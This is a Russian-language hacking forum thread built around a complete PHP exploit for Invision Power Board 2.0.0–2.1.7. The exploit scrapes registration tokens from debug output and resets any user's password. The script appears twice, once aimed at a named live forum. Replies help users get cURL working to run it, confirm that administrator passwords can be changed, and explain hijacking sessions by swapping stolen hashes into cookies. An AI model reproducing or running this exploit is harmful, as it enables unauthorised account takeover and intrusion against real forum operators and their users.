<?php
/*

Debug Mode password change vulnerability
Affects Invision Power Borard 2.0.0 to 2.1.7
by Rapigator

This works if:

"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on

In General Configuration of the forum software.

*/

// The forum's address up to and including 'index.php'
$site = "http://forum123.ru";

// An existing user's login name
$name = "123";

// The new password(3-32 characters)
$pass = "1234";

// You can use a proxy...
$proxy = "219.11.80.65:8080";



// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "debug=1";
$curl = curl_init($site.'act=Reg&CODE=10&'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset($regid) || !isset($regcode))
{
echo "Error: Probably not vulnerable, or no forum found";
exit;
}

$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}

function change_pass($regcode,$regid,$vid,$userid) {
global $site, $suffix, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo "Password Changed!";
exit;
}
?>
Все функции правильно написаны, но вылетает ерор :( Пподскажите в чем трабл? :confused:

<?php
/*

Debug Mode password change vulnerability
Affects Invision Power Borard 2.0.0 to 2.1.7
by Rapigator

This works if:

"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on

In General Configuration of the forum software.

*/

// The forum's address up to and including 'index.php'
$site = "http://forum.nevsedoma.com.ua/index.php";

// An existing user's login name
$name = "life:)";

// The new password(3-32 characters)
$pass = "1234";

// You can use a proxy...
$proxy = "219.11.80.65:8080";



// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "debug=1";
$curl = curl_init($site.'act=Reg&CODE=10&'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset($regid) || !isset($regcode))
{
echo "Error: Probably not vulnerable, or no forum found";
exit;
}

$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}

function change_pass($regcode,$regid,$vid,$userid) {
global $site, $suffix, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo "Password Changed!";
exit;
}
?>
Все функции правильно написаны, но вылетает ерор :( Пподскажите в чем трабл? :confused:
Error: Probably not vulnerable, or no forum found?
мб залатали уже или ты ссылку не прально указал=)

ты курл подключил ?

этот эксплойт работаеть, только со включенным курлом, что бы его включить надо провести некие манипуляции с апачем :)

Это описание для тех, кто не знает, как сделать так чтобы заработал php_curl:

1. Качаем http://limpompo.jino-net.ru/php_curl.rar
2. Копируем libeay32.dll и ssleay32.dll в диру c:\windows\system32\
3. Копируем php_curl.dll в диру [you_apache_dir]\php\extensions
4. Редактируем PHP.ini - Удаляем Комент с extension=php_curl.dll
5. Перезагрузи Апачу!
6. Уря =) Работает... ыыыыыы

С Уважением limpompo.


ссылка битая, а новую найти я не смог...

Поставь апач и мускул на локал машину. Там же прокси указать можно даже. Вклюсишь курл, вобьёшь прокси и проверишь работает или нет.

А лучше скачай денвер http://denwer.ru там сразу и апач и мускул

А лучше скачай денвер http://denwer.ru там сразу и апач и мускул
http://www.appservnetwork.com/ - мне этот больше нравится=\

но тама нету php_curl! =)

А что делать когда ошибка в php_curl?

вот http://flyelf.narod.ru/musor/curl.zip

а можно узнать что вообще делает этот сплоит?

изменят пасс узвера!-)

у админов тоже пасы можно менять ?

у админов тоже пасы можно менять ?

ессесно. Ток не обалщайся форум должен быть в режиме debug

А если форум пропатчен, то этот сплоит работает ?

Mordalio
нет!

все вроде сделал правильно
// The forum's address up to and including 'index.php'
$site = "http://www.sssss.ru/forums2/index.php";

// An existing user's login name
$name = "jhgdfhgfdgdsgfds@mail.ru"; имя которое зарегано на форуме

// The new password(3-32 characters)
$pass = "jhgdfhgfdgdsgfds@mail.ru"; пасс

// You can use a proxy...
//$proxy = "219.11.80.65:8080"; прокси убрал (онитут обязательно нужны?)
и кто может сделать так что бы работать без прокси браузер как бы прокси потдерживает и не за безопасность беспокоиться не приходится да ем более и впн еще

А чё этот сплоит бесполезен если стоит "Защитный код" О_о?... чото у мя вот так после запуска выходит:
PHP Fatal error: Call to undefined function: curl_init() in C:\123\forums\change.php on line 37 X-Powered-By: PHP/4.4.4 Content-type: text/html

37 это чото вот:
$curl = curl_init($site.'act=Reg&CODE=10');

эрор в студию, а curl подключен?
з ы
эксплоит видел у миливорма

Слил длл.ки, подключил курл к пхп (денвер) всеравно подобная ошибка,подскажите чтонить...

UPD все, разобрался

Форум ipb 2.1.6. Получил хеш юзера...захожу оперу, что бы изменить куки...Всякое ненужное удаляю..но у меня такой вопрос! Сессию тоже надо удалять?

Вроде там надо заменить хеш и Id вроде все лично я так делал :)
Если чо не так,не пинайте я только учусь :)

http://milw0rm.com/exploits/4841
v.2.1.7 © Eugene Minaev

подскажите пожалуйста версию IPB, в обзоре уязвимостей не нашел. Заранее спасибо.

forum.sevstar.net

====
PHP5 cURL: http://xfiletrash.narod.ru/php_curl.rar
====
Чтоб не трахались как я))

Fatal error: Call to undefined function curl_init() in C:\AppServ\www\start.php on line 37

37. $curl = curl_init($site.'act=Reg&CODE=10');


Это я ге-то с кулом тупанул? Вроде скачал, всё позаменял , строчки поудалял.. всё как на епрвой страничке написано сделал.. и вот так вот..

SkyS, скачай WampServer, там в настройках включи курл.